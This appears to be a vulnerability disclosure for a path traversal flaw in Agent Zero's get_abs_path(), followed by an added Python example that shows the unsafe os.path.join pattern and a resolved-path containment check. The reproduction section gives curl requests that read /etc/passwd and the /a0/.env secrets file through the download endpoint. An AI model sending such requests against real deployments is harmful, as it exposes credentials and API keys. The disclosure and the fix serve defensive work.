| Title | frdel agent-zero 0.9.7-10 Path Traversal (CWE-22) |
|---|
| Description | # Technical Details
An Arbitrary File Read via Path Traversal vulnerability exists in the `get_abs_path()` function in `python/helpers/files.py` of Agent Zero.
The application fails to validate that user-supplied file paths remain within the intended workspace directory. Python's `os.path.join()` discards all previous path components when given an absolute path, allowing attackers to escape the workspace directory.
# Vulnerable Code
File: python/helpers/files.py (get_abs_path function)
Method: get_abs_path(*relative_paths) -> os.path.join(get_base_dir(), *relative_paths)
Why: os.path.join("/workspace", "/etc/passwd") returns "/etc/passwd", completely ignoring the base directory.
Endpoint: python/api/download_work_dir_file.py
Flow: GET /download_work_dir_file?path=/etc/passwd -> file_info.get_file_info("/etc/passwd") -> files.get_abs_path("/etc/passwd") -> returns "/etc/passwd"
# Reproduction
1. Start Agent Zero: docker run -d -p 50001:80 agent0ai/agent-zero:latest
2. Get CSRF token: curl -s -c /tmp/cookies.txt "http://localhost:50001/csrf_token"
3. Read /etc/passwd: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/etc/passwd"
4. Read secrets: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/a0/.env"
# Impact
- Arbitrary file read (system files, SSH keys, cloud credentials)
- Exfiltration of API keys and secrets from /a0/.env
- Chain with leaked A0_PERSISTENT_RUNTIME_ID for authentication bypass and RCE |
|---|
| Source | ⚠️ https://gist.github.com/YLChen-007/1819c843ad26aaaaecdc768a789df022 |
|---|
| User | Eric-y (UID 95889) |
|---|
| Submission | 05/03/2026 03h23 (1 month ago) |
|---|
| Moderation | 16/03/2026 22h32 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 351337 [frdel/agent0ai agent-zero 0.9.7-10 python/helpers/files.py get_abs_path Directory Traversal] |
|---|
| Points | 20 |
|---|
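
The `os.path.join()` behaviour described under "Vulnerable Code", next to one way to contain it. This is an added example, not Agent Zero's code or its fix. The names `get_abs_path_unsafe`, `get_abs_path_checked`, `PathEscapeError` and `classify`, and the temporary workspace, are assumptions made for illustration. It goes beyond the absolute-path case in the report by also rejecting `..` sequences and symlinks that resolve outside the workspace.

```python
import os
import tempfile


class PathEscapeError(ValueError):
    """Raised when a requested path resolves outside the workspace."""


def get_abs_path_unsafe(base_dir, *relative_paths):
    # Pattern described in the report: an absolute component discards base_dir.
    return os.path.join(base_dir, *relative_paths)


def get_abs_path_checked(base_dir, *relative_paths):
    # Resolve symlinks and ".." first, then require the result to stay under base_dir.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *relative_paths))
    if os.path.commonpath([base, candidate]) != base:
        raise PathEscapeError(f"{candidate!r} is outside {base!r}")
    return candidate


def classify(base_dir, requested):
    """Return 'allowed' or 'blocked' for one requested path."""
    try:
        get_abs_path_checked(base_dir, requested)
        return "allowed"
    except PathEscapeError:
        return "blocked"


def demo():
    # Constructed workspace with a symlink that points outside it.
    base = tempfile.mkdtemp(prefix="workdir_")
    os.makedirs(os.path.join(base, "notes"))
    os.symlink("/etc", os.path.join(base, "link_out"))
    requests = ["notes/todo.txt", "/etc/passwd", "../../etc/passwd", "link_out/passwd"]
    return {r: classify(base, r) for r in requests}


if __name__ == "__main__":
    print(get_abs_path_unsafe("/workspace", "/etc/passwd"))
    for path, verdict in demo().items():
        print(f"{verdict:8} {path}")
```

The check compares fully resolved paths, so a plain `startswith()` prefix test (which would accept a sibling directory such as `/a0_backup` for a base of `/a0`) is avoided.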